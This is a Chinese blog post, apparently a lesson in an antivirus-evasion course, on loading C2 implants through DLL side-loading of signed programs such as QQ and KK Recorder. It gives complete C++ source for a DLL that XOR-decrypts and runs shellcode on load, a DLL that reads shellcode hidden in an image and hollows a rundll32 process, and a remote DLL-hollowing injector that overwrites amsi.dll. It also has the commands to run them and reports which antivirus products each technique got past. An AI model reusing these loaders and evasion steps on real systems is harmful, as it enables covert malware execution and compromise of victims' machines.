免杀对抗——C2远控篇&C&C++&DLL注入&过内存核晶&镂空新增&白加黑链&签名程序劫持

原创 于 2025-11-23 16:25:09 发布 · 677 阅读 · 13 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#c语言 #c++ #安全 #学习 #网络安全 #免杀对抗

文章目录

免杀对抗——第一百五十三天

C2远控篇&C&C++&DLL注入&过内存核晶&镂空新增&白加黑链&签名程序劫持

前置知识

开启360核晶

  • 从本节课开始,我们就不再看火绒的了,主要聚焦于360、卡巴以及DF,然后我们还需要将360的核晶开启来,参考文章地址:https://blog.csdn.net/fishfishfishman/article/details/134156418
    在这里插入图片描述

  • 然后,我们就可以开始学习接下来的技术,尝试绕过360核晶、卡巴以及DF等等

DLL调用逻辑
  • 在Windows中,程序加载DLL的逻辑顺序如下:
    (1)可执行程序加载的目录
    (2)系统目录
    (3)16位系统目录
    (4)Windows目录
    (5)运行某文件的所在目录
    (6)路径环境变量中列出的目录
白加黑

  • 我们在之前权限提升中讲过DLL劫持,这里其实也差不多,主要还是四种方式:

    1. 利用系统自带的程序加载生成的恶意上线DLL
    2. 用白名单程序加载的DLL - 在原有的基础上替换DLL文件
    3. 用白名单程序加载的DLL - 在原有的基础上加DLL文件
    4. 用白名单程序加载的DLL - 在原有的基础上加执行代码
    5. 用白名单进程加载的DLL - 在原有的基础上加DLL注入

  • 上面说的这些其实就是大名鼎鼎的白加黑,通过白名单程序加载恶意的黑DLL文件,进而绕过杀毒软件的检测

  • 只是说这四种思路加载DLL的方式又各不相同,免杀的效果也不相同
    在这里插入图片描述

  • 然后下面我们就围绕这几种方式去看看他们如何实现,以及其免杀性

  • 但是这种方式的缺点就是我们需要观察目标主机上面存在的第三方程序,然后下载到本地模拟程序加载DLL,制作好之后再上传到其目录执行EXE上线

C2远控 - DLL注入-白加黑-调用执行&DLL劫持

加载恶意DLL文件

  • 这个就是直接上传恶意的DLL文件,我们先不考虑免杀的问题,然后用系统自带的程序去执行这个DLL,比如rundll32.exe程序

  • 我们先用VS创建一个DLL项目:
    在这里插入图片描述

  • 这里会自动创建两个文件,然后将dllmain.cpp代码改为如下:

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <windows.h>
#include <iostream>
HANDLE My_hThread = NULL;
DWORD  WINAPI  ceshi(LPVOID pParameter)
{
    char encryptedShellcode[] = "<ShellCode>";

    // 定义解密所用的密钥

    char key[] = "<Key>";

    // 定义一个与加密shellcode大小相同的数组用于存储解密后的shellcode
    unsigned char shellcode[sizeof encryptedShellcode];

    // 获取密钥的长度
    int keylength = strlen(key);

    // 遍历加密的shellcode,并使用异或操作进行解密,将结果存储在shellcode数组中
    for (int i = 0; i < sizeof encryptedShellcode; i++) {
        shellcode[i] = encryptedShellcode[i] ^ key[i % keylength];
        printf("\\x%x", shellcode[i]);
    }

    // 获取解密后的shellcode的地址
    char* addrShellcode = (char*)shellcode;

    // 声明一个DWORD变量用于存储旧的内存保护属性
    DWORD dwOldPro = 0;

    // 更改解密后的shellcode所在内存区域的保护属性,允许执行、读、写
    BOOL ifExec = VirtualProtect(addrShellcode, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &dwOldPro);

    // 使用EnumUILanguages函数执行解密后的shellcode
    EnumUILanguages((UILANGUAGE_ENUMPROC)addrShellcode, 0, 0);
    return 0;
}


BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH://初次调用dll时执行下面代码
        My_hThread = ::CreateThread(NULL, 0, &ceshi, 0, 0, 0);//新建线程
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
extern"C" _declspec(dllexport) void test()
{
    int a;
    a = 0;
}
  • 如果这里是32位的ShellCode,并且在之后生成运行时显示"xxx.dll出错,缺少xxx条目"的,需要在当前目录加一个mydll.def文件,写入如下内容:
; mydll.def - 强制导出未修饰的函数名
LIBRARY Dll1  ; 你的DLL名称(不含.dll)
EXPORTS
    ceshi      ; 导出的函数名

  • 然后配置项目属性:
    在这里插入图片描述
    在这里插入图片描述

  • 接着我们将生成的dll文件(我这里是Dll1.dll)放到目标主机,运行如下命令:

// rundll32.exe dll文件 入口函数
rundll32/rundll32.exe Dll1.dll ceshi

在这里插入图片描述

  • 可以看到不考虑免杀的情况是能够成功上线的,但是这种方式免杀性极弱,而且很多时候杀毒软件都会拦截rundll32.exe这些程序的操作,所以效果不佳
白加黑 - DLL劫持

  • 我们为了避免杀毒软件监控系统自带软件的敏感行为,可以用一些白名单程序,所谓白名单程序其实就是第三方或者官方加了签名的程序,比如QQ、微信等等
    在这里插入图片描述

  • 因为系统自带的程序数量少,默认会加载哪些DLL可能杀毒软件都清楚,但是如果是第三方的白名单程序数量很多,杀毒软件不可能每个都记录其所加载的DLL文件,因此可能免杀的几率会大很多

  • 然后我们的第一个思路就是将上面的DLL1.dll程序,直接加到某个白名单程序下面,让其调用上线

  • 在此之前需要下载微软官方的进程分析ProcessMonitor工具:Process Monitor - Sysinternals | Microsoft Learn

  • 使用教程:Process Monitor的基本使用方法_process monitor怎么用-CSDN博客

  • 再下载一个白名单程序,比如小迪用的KK录像机:录屏软件哪个好用_电脑录屏怎么录_KK录像机官网_免费下载
    在这里插入图片描述

  • 我们要让他加载自定义的DLL程序,首先想到的就是之前讲的DLL劫持,所以要看他会加载哪些DLL文件,于是我们用ProcessMonitor看看:
    在这里插入图片描述

  • 设置规则,然后点进去就可以看到它所调用的DLL文件:
    在这里插入图片描述

  • 当然这里我们要找Path和Company都是KK.exe的DLL,比如这个libfontconfig-1.dll
    在这里插入图片描述

  • 然后我们将之前生成的Dll1.dll替换这个文件,让他调用的libfontconfig-1.dll为我们的恶意DLL文件

  • 但是这样很可能让程序无法启动,导致dll也没办法正常加载,所以慎用:
    在这里插入图片描述

白加黑 - 增加新DLL文件

  • 刚才那种替换DLL文件的方式失败了,缺少某个dll文件会导致整个程序无法运行,所以我们想到不改变原本的文件结构添加DLL文件

  • 于是可以用一些工具,比如StudyPE+去添加DLL,需要注意DLL文件的位数,选择对应位数的程序启动,将libfontconfig-1.dll文件拖进去,点击导入函数,添加我们的恶意DLL:
    在这里插入图片描述

  • 这里添加函数时可能会显示PE位数不对,原因是原本的DLL是32位,我这里编译成了64位,所以重新编译成32位即可:
    在这里插入图片描述

  • 导入成功后就会多出一个我们的恶意函数test(),将这个函数添加进去:
    在这里插入图片描述

  • 关闭时点击保存覆盖掉原来的DLL文件,并且将这两个DLL文件放到原目录下面,然后我们再运行这个KK录像程序,就会发现程序运行成功并且也上线成功了:
    在这里插入图片描述

  • 其实它的调用逻辑就是:

KK程序  -->  libfontconfig-1.dll  -->  Dll1.dll  -->  上线
  • 不过现在这个技术火绒、360、DF、卡巴都过不了,会直接查杀这个KK.exe文件,所以还得再做得隐蔽一些才行

C2远控 - DLL劫持-白加黑-更改DLL&DLL镂空

白加黑 - 改变原DLL代码

  • 上面这种通过原DLL文件调用恶意DLL文件的方式还是需要我们上传恶意DLL文件,并做到免杀,而且有些程序它有防增加DLL文件的检测,并不高效

  • 因此我们想到,可以直接更改原DLL文件的代码结构,我们以QQ作为演示,首先还是要找到其运行时所加载的DLL文件,这里如果直接找它是空白的,可能是有防查看的一些功能
    在这里插入图片描述

  • 我们需要自己设定一些规则去进行筛选,比如:

Rules:
Process Name     is        QQ.exe         Include
Result           is        SUCCESS        Include
Path          contains     dll            Include
Path          contains     System32       Exclude

  • 然后这里我们找到的是TaskTray.dll文件,当然找其他的也是一样的,只是这个文件之后识别出来的函数会少一点,比较好改动:
    在这里插入图片描述

  • 我们将这个文件拿出来,用VS自带的dumpbin工具去查看它的位数以及包含的函数:

# 查看包含函数
.\dumpbin /exports "D:\Program Files(x86)\Tencent\QQ\Bin\TaskTray.dll"

# 查看位数
.\dumpbin /headers "D:\Program Files(x86)\Tencent\QQ\Bin\TaskTray.dll"

在这里插入图片描述
在这里插入图片描述

  • 当然也可以通过StudyPE+程序直接查看:
    在这里插入图片描述
    在这里插入图片描述

  • 这个函数其实就是导出函数,也就是类似于我们之前自己写的像test()ceshi()这样的函数,那我们其实就可以直接自己写一个新的DLL文件,将这些信息也放到我们的DLL文件中:

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
using namespace std;

extern "C" __declspec(dllexport) int DllCanUnloadNow()
{
    return 0;
}
extern "C" __declspec(dllexport) int DllGetClassObject()
{
    return 0;
}
extern "C" __declspec(dllexport) int DllRegisterServer()
{
    return 0;
}
extern "C" __declspec(dllexport) int DllUnregisterServer()
{

    return 0;
}


BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH: {

        FILE* fp;
        size_t size;
        unsigned char* buffer;
        fp = fopen(".\\1.bmp", "rb");
        fseek(fp, 0, SEEK_END);
        size = ftell(fp);
        fseek(fp, 0, SEEK_SET);
        buffer = (unsigned char*)malloc(size);
        fread(buffer, size, 1, fp);

        char* v7A = (char*)VirtualAlloc(0, size, 0x3000u, 0x40u);
        memcpy((void*)v7A, buffer, size);

        struct _PROCESS_INFORMATION ProcessInformation;
        struct _STARTUPINFOA StartupInfo;
        void* v24;
        CONTEXT Context;
        memset(&StartupInfo, 0, sizeof(StartupInfo));
        StartupInfo.cb = 68;
        BOOL result = CreateProcessA(0, (LPSTR)"rundll32.exe", 0, 0, 0, 0x44u, 0, 0, &StartupInfo, &ProcessInformation);
        if (result)
        {
            Context.ContextFlags = 65539;
            GetThreadContext(ProcessInformation.hThread, &Context);
            v24 = VirtualAllocEx(ProcessInformation.hProcess, 0, size, 0x1000u, 0x40u);
            WriteProcessMemory(ProcessInformation.hProcess, v24, v7A, size, NULL);
            // 64 位使用 Context.Rip = (DWORD_PTR)v24;
            Context.Eip = (DWORD_PTR)v24;
            //Context.Rip = (DWORD_PTR)v24;
            SetThreadContext(ProcessInformation.hThread, &Context);
            ResumeThread(ProcessInformation.hThread);
            CloseHandle(ProcessInformation.hThread);
            result = CloseHandle(ProcessInformation.hProcess);
        }

        TerminateProcess(GetCurrentProcess(), 0);

    }

    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

python2 dkmc.py
gen
set shellcode xxxx
run

  • 将ShellCode隐写到图片中,然后通过上面的方式进行读取,将生成的DLL文件更名为TaskTray.dll,连同图片一起放到目标主机上,运行qq程序成功上线:
    在这里插入图片描述

  • 过火绒还是轻轻松松,360、DF目前也还是能过,只是不太稳定,莫名奇妙会掉,但是也不报毒,也不查杀,我感觉是这个CS工具有点问题

DLL镂空
  • 这个和之前进程镂空技术差不多,不过我们这里是让其他进程去帮我们加载一个新的恶意DLL文件,这个DLL文件通过代码自动生成,直接上代码:
#include <iostream>
#include <Windows.h>
#include <psapi.h>

int main(int argc, char* argv[])
{
	HANDLE processHandle;
	PVOID remoteBuffer;
	wchar_t moduleToInject[] = L"C:\\windows\\system32\\amsi.dll";
	HMODULE modules[256] = {};
	SIZE_T modulesSize = sizeof(modules);
	DWORD modulesSizeNeeded = 0;
	DWORD moduleNameSize = 0;
	SIZE_T modulesCount = 0;
	CHAR remoteModuleName[128] = {};
	HMODULE remoteModule = NULL;

	// 64位shellcode
	char encryptedShellcode[] = "<ShellCode>";

	// 定义解密所用的密钥

	char key[] = "<Key>";

	// 定义一个与加密shellcode大小相同的数组用于存储解密后的shellcode
	unsigned char shellcode[sizeof encryptedShellcode];

	// 获取密钥的长度
	int keylength = strlen(key);

	// 遍历加密的shellcode,并使用异或操作进行解密,将结果存储在shellcode数组中
	for (int i = 0; i < sizeof encryptedShellcode; i++) {
		shellcode[i] = encryptedShellcode[i] ^ key[i % keylength];
		printf("\\x%x", shellcode[i]);
	}


	// 创建远线程注入正常的DLL
	processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
	//processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 3488);

	remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof moduleToInject, MEM_COMMIT, PAGE_READWRITE);
	WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)moduleToInject, sizeof moduleToInject, NULL);
	PTHREAD_START_ROUTINE threadRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
	HANDLE dllThread = CreateRemoteThread(processHandle, NULL, 0, threadRoutine, remoteBuffer, 0, NULL);
	WaitForSingleObject(dllThread, 1000);

	// 找到注入的DLL模块基址
	EnumProcessModules(processHandle, modules, modulesSize, &modulesSizeNeeded);
	modulesCount = modulesSizeNeeded / sizeof(HMODULE);
	for (size_t i = 0; i < modulesCount; i++)
	{
		remoteModule = modules[i];
		GetModuleBaseNameA(processHandle, remoteModule, remoteModuleName, sizeof(remoteModuleName));
		if (std::string(remoteModuleName).compare("amsi.dll") == 0)
		{
			std::cout << remoteModuleName << " at " << modules[i];
			break;
		}
	}

	//得到DLL入口点
	DWORD headerBufferSize = 0x1000;
	LPVOID targetProcessHeaderBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, headerBufferSize);
	ReadProcessMemory(processHandle, remoteModule, targetProcessHeaderBuffer, headerBufferSize, NULL);

	PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)targetProcessHeaderBuffer;
	PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)targetProcessHeaderBuffer + dosHeader->e_lfanew);
	LPVOID dllEntryPoint = (LPVOID)(ntHeader->OptionalHeader.AddressOfEntryPoint + (DWORD_PTR)remoteModule);
	std::cout << ", entryPoint at " << dllEntryPoint;

	// 覆盖DLL代码
	WriteProcessMemory(processHandle, dllEntryPoint, (LPCVOID)shellcode, sizeof(shellcode), NULL);

	// 远线程执行
	CreateRemoteThread(processHandle, NULL, 0, (PTHREAD_START_ROUTINE)dllEntryPoint, NULL, 0, NULL);

	return 0;
}
  • 这样直接生成的EXE文件啥都过不了,我们还是暂时不考虑免杀,看看运行效果:
Dll1.exe <PID>

在这里插入图片描述

  • 这里需要PID为32位的程序,然后如果显示的不是at 0000000就说明应该是成功了,but这里我也没成功,所以这个技术基本没什么鸟用,查杀很严重
红队白加黑技术(DLL劫持注入)
盾悟
09-22 1万+
摘要:白加黑技术是一种恶意软件策略,通过合法程序(如EXE)加载恶意DLL文件,利用Windows的DLL搜索顺序规避检测。其心机制包括DLL劫持、白文件选择和恶意DLL构造,依赖系统对可信程序的默认信任。防御方法包括启用SafeDLL搜索模式、数字签名验证和行为监。该技术正演变为进程注入、服务劫持等变种,未来可能结合AI和云端对抗。建议通过系统加固、EDR工具和逆向分析提升防护能力。(149字)
C2&C&C++&DLL注入&内存&镂空新增&白加黑&签名程序劫持
2302_80396242的博客
06-20 914
为了使内存的效果更好,在申请内存时一般采用渐进式申请一块可读写内存,在运行时改为可执行,在执行的时候遵循分离的思想。这是我们容易进行dll劫持的关键,"SUCCESS"是存在dll加载成功的情况表明exe确实去加载了这个dll,所以我们凭借此来做黑dll让它加载;2.属性->C/C++->代码生成->运行库->多线程 (/MT)如果是debug则设置成MTD。就是说我们的目标是dll,其他乱七八糟的后缀我们不需要,就过滤掉;➢C2-DLL劫持-白加黑-再加DLL&更改DLL。
对抗—DLL劫持&白加黑&隐写分离&EDR&Syscall-hook
2301_76227305的博客
10-31 3527
对于白加黑效果是比较强的,关键是DLL后门的,分离或者混淆都可以实现。至于这个Syscall,我是不会编写,只能玩一下别人的项目,而且这玩意挺难的我说实话,更加偏向于二进制那边的了。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习
第116天:对抗-EDR&Syscall-hook&DLL反射注入&白加黑&隐写分离&加载器
qq_46081990的博客
07-23 1305
之前介绍的是exe,现在讲的是"dll加载",当然exe的技巧也可以用到dll加载上,比如加密混淆、分离等 dll加载主要涉及以下几种方式: 1、自写DLL调用加载: 由于dll无法直接执行,所以可以写一个py文件打包成exe,其只是用来调用dll,而dll中写有shellcode 2、DLL劫持-白加黑-导入加载: 利用进程工具获取白应用执行要加载哪些dll,将其中某个dll导入pe工具添加恶意dll函数,然后替换原来的dll,最后运行白应用 3、DLL劫持-白加黑-导出编译:(适用某些会检测dll
对坑-白加黑dll劫持
qq_73685476的博客
04-22 1529
对坑-白加黑dll劫持
白加黑-利用微信&QQ上线CS,轻松过某绒、某卫士、Defender
qq_62169455的博客
02-03 3986
通常在运行一个EXE文件的时候,会先加载支持该EXE文件运行的DLL(动态接库)文件,那如果把其中一个DLL文件替换成恶意DLL,DLL里面注入一个后门文件, 当被攻击者双击执行程序时,就会加载恶意DLL,进而触发后门文件,最终达到制对方主机的目的。替换DLL操作,也就是我们所说的“DLL劫持”,而“白+黑”里面的“白”则指的是EXE文件(带有数字签名),“黑”则指替换的恶意DLL。
ShellCode_Loader - Msf&CobaltStrikeShellCode加载器&加密工具
lza20001103的博客
09-04 2913
ShellCode_Loader - Msf&amp;CobaltStrikeShellCode加载器&amp;加密工具 文章目录ShellCode_Loader - Msf&amp;CobaltStrikeShellCode加载器&amp;加密工具一、声明二、测试环境三、生成Msf_Payload四、生成CobaltStrike_Payload五、加密Payload六、配置ShellCode加载器七、打包可执行程序(EXE编译环境)八、上线测试 ShellCode_Loader - Msf&amp
白加黑教程——深入浅出掌握技巧
gitblog_06764的博客
04-22 288
白加黑教程——深入浅出掌握技巧 去发现同类优质开源项目:https://gitcode.com/ 白加黑教程,这是一份非常优秀的教程资源。本教程详细介绍了白加黑技术的基本原理和操作步骤,旨在帮助读者深入理解并掌握这一实用技巧。 教程从基础知识入手,逐步讲解了白加黑技术的各个方面,包括但不限于基本概念、操作方法、注意事项等。内容丰富,条理清晰,无论是初学者还是有一定基础的读者,都可以...
对抗--知识点总结
金灰的博客
05-18 1736
文件和校验法。
全套教程+工具合集
08-25
专题(1)-基础.pdf 专题(2)-msfvenom隐藏的参数.pdf 专题(3)-msf自带(VT率35-69).pdf 元专题(4)-Evasion模块(VT率12-71).pdf 专题(5)-Veil(VT23-...
白加黑教程,很优秀的教程
03-06
这个&quot;白加黑教程&quot;显然关注的是如何让恶意代码不被安全软件识别,从而提高其在目标系统上的隐蔽性和生存能力。技术是黑客和网络安全专家之间的猫鼠游戏的一部分,因为安全软件不断更新以识别新的威胁,而攻击...
C.滑动窗口——1343. 大小为 K 且平均值大于等于阈值的子数组数目
要努力去发光,而不是被照亮~
11-21 187
C.滑动窗口——1343. 大小为 K 且平均值大于等于阈值的子数组数目解析
C++」list的使用及模拟实现
2303_81373308的博客
11-19 1038
介绍C++中list容器的使用与实现。文章重点讲解了list的特殊接口(sort、merge、unique等)及注意事项,迭代器的分类与特性,list的简易模拟实现。
C++ STL set 系列完全指南:从底层原理、心接口到实战场景
Loving_enjoy的博客
11-19 378
cout << "分数在[" << min_score << ", " << max_score << "]之间的学生:" << endl;cout << "检查用户100: " << (ac.checkAccess(100)?cout << "用户" << user_id << "原本就没有访问权限" << endl;cout << "multiset元素个数:" << ms.size() << endl;cout << "用户" << user_id << "的访问权限已撤销" << endl;
C++】智能指针
2401_89058999的博客
11-21 567
什么是内存泄漏:内存泄漏指因为疏忽或错误造成程序未能释放已经不再使用的内存,一般是忘记释放或者发生异常释放程序未能执行导致的。内存泄漏并不是指内存在物理上的消失,而是应用程序分 配某段内存后,因为设计错误,失去了对该段内存制,因而造成了内存的浪费。内存泄漏的危害:普通程序运行一会就结束了出现内存泄漏问题也不大,进程正常结束,页表的映射 关系解除,物理内存也可以释放。
开源鸿蒙 Cordova 设备信息插件开发详解
最新发布
夏天的博客
11-22 914
Apache Cordova 是一个开源的移动应用开发框架,允许开发者使用 HTML、CSS 和 JavaScript 构建跨平台移动应用。Cordova 通过插件机制提供了访问设备原生功能的能力,使 Web 应用能够调用系统 API。
DAY13 Understanding C Pointers, Strings, and Stack Memory: A Practical Guide
weixin_46607526的博客
11-19 859
本文介绍了C语言中指针、字符串和栈内存心概念及应用。重点讲解了指针作为函数参数时的值传递与引用传递区别,以及指针与数组的关系。通过实现字符串长度计算、复制、连接和比较等自定义函数,展示了指针操作字符串的方法。文章还包含栈内存的图示说明,帮助理解函数调用时的内存分配。最后总结了指针在内存操作、数组处理和字符串处理中的基础作用,为进阶C编程打下基础。
CH58x 蓝牙芯片 SysTick、RTC、TMRx
不浮夸,不将就,认真对待学知识的我们
11-19 979
带您理解沁恒微 RISC-V 蓝牙芯片 CH58x 的滴答定时器,RTC 和通用定时器 ...... 矜辰所致
C++性能分析
2509_93941656的博客
11-20 211
另外,C++的STL容器虽然方便,但如果不注意使用场景,vector的频繁扩容或list的指针跳转都可能成为隐患。例如,遍历一个二维数组时,按行访问比按列访问快得多,因为内存是连续分配的。举个例子,在一个图像处理应用中,我发现某个滤波函数占用了80%的CPU时间,通过改用SIMD指令优化,性能提升了3倍。同时,日志记录要适度,过多的I/O操作会掩盖真实瓶颈。另外,内联函数和循环展开等编译器优化选项也能带来意外收获,但需谨慎使用,以代码可读性下降。使用互斥锁时,如果临界区过大,会导致线程阻塞,降低吞吐量。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值